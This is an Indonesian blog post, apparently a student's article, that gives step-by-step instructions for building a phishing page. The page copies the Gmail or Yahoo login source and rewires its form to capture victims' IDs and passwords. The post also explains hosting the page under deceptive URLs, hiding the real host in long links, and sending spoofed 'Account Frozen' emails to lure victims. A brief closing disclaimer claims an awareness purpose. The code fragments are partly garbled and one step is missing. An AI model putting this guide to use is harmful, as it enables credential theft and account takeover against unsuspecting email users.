Langkah-langkah yang lakukan untuk mendapat source code dari website penyedia layanan email adalah:
1. Silakan buka web browser favorit Anda dan buka salah satu website penyedia layanan email (gmail, yahoo, hotmail dll). Jika id email yang akan kita menghendaki korban yang menggunakan email username@gmail.com maka kita harus membuka www.mail.google.com
2. Setelah halaman website penyedia layanan email terbuka, klik sekali pada web brower Anda dan tekan 'Ctrl+U', maka akan muncul jendela tab baru yang berisi source code dari situs gmail.
3. Salin kode sumber (source code) dari tab jendela browser (Anda dapat menggunakan 'Ctrl+A' untuk menyeleksi seluruh kode sumber dan 'Ctrl+C' untuk menyalin dari tab jendela browser.
4. Buka Notepad dan paste kode sumber tersebut. Maka anda telah mendapatkan kode sumber dari situs gmail bisa Anda modifikasi.
5. Simpan dengan nama goharsdotcom.html atau nama sesuai dengan selera anda dengan ekstension .html tentunya.
action = "https: / / login.yahoo.com / config / login?"AutoComplete="off" name = "login_form"> (ini adalah kode ini berhubungan dengan yahoo, untuk situs lain silakan cari kode sumber yang dimulai dan mempunyai string (form = "post" action = "xxxxxxxxxxxxx"))
7. Ganti kode (= form "post" action = "xxxxxxxxxxxxx") dengan kode berikut setelah menempatkan ID Formulir Anda:
Your Form ID Here" method="post" enctype="application/x-www-form-urlencoded" onsubmit="return New_Form_CF();">
Fungsi dari kode tersebut adalah mengelabuhi korban agar memasukkan ulang ID dan Paswordnya seolah-olah yang diisikan salah.
8. Sekarang silakan simpan lagi file goharsdotcom.html.
Setelah selesai merubah kode sumber tersebut maka persiapan awal kita telah selesai. Untuk selanjutnya silakan diteruskan membaca artikel berikut, boleh sambil minum kopi atau makan makanan ringan agar lebih enjoy!.
Jika Anda ingin meng-hack ID dan Password korban, maka korban harus login ke akunnya melalui halaman web yang telah kita tanamkan kode sumber yang telah kita modifikasi tadi. (Cara membuat seseorang agar login dari halaman web kita akan dijelaskan pada bagian akhir artikel ini).
Untuk membuat halaman website yang fungsinya memancing korban login ke web kita, maka file kode sumber goharsdotcom.html harus kita upload dan tersimpan sebagai web hosting email gratis ( Anda dapat mecari di google 'Panduan membuat web secara gratis').
Sekarang pilih nama situs Anda sebagai yourmail.yahoo.com/support atau email.yahoo.com/support atau beberapa format lain yang mana korban dapat diyakinkan untuk login.
Anda dapat menambahkan banyak email yang tidak terkait dalam URL tersebut (misalnya mail.yahoo.com/support/EhnTuhds_SecureLogin atau jika korban tidak mempunyai pengetahuan banyak tentang email dan internet maka url sederhana seperti www.GmaillgoinSecureLogin.webs.com korban tidak akan mengetahui bahwa itu alamat palsu dan kita bisa membuat web seperti itu secara gratis. Anda juga bisa menambahkan email sampah dan membuat link yang sangat panjang sehingga korban tidak akan melihat nama hosting di link yang Anda berikan.
Membuat email palsu seperti support_yahoo@yahoo.com (seperti dll@gmail.com /Support.googleforyou jika ID korban adalah gmail) dan mengirim email kepada korban dan manyatakan "Account Frozen" ("Akun Beku") dan dalam email tertulis "Karena ada beberapa kesalahan teknis di yahoo maka kami membutuhkan Anda untuk login melalui link ini dinyatakan Account Anda dibekukan"
Setelah membaca ini korban meng-klik link tesebut dan memsasukkan ID dan Pasword, setelah ini terjadi karena Anda telah memberikan URL ulang sebagai URL dari situs yang telah kita buat tadi maka setelah di klik submit oleh korban akan kembali ke halaman login lagi. Korban akan berpikir bahwa ia mungkin telah salah memasukkan ID atau Password sehingga halaman reloaded lagi (Seperti biasanya jika terjadi kesalahan kita login melalui sebuah situs), padahal sebenarnya username dan password korban akan terkirim pada akun email kita dan korban tidak akan pernah tahu bahwa emailnya telah di Hack...
Peringatan:
"Dengan menulis artikel ini kami hanya bermaksud agar Anda menyadari adanya Phishing dan hanya sebuah kontribusi kecil bagi Anda. Harap tidak menggunakan trik sederhana ini untuk mendapatkan data pribadi seseorang karena hal tersebut adalah illegal. Semoga bermanfaat."
Terima Kasih.
Penulis:
NIM : 101065 2006
Nama : Akhmad Ali Anwar
TI Sore
Daftar Pustaka:
1. www.google.co.id/search?
2. www.en.wikipedia.com
3. www.articlesbase.com
Tidak ada komentar:
Posting Komentar
Catatan: Hanya anggota dari blog ini yang dapat mengirim komentar.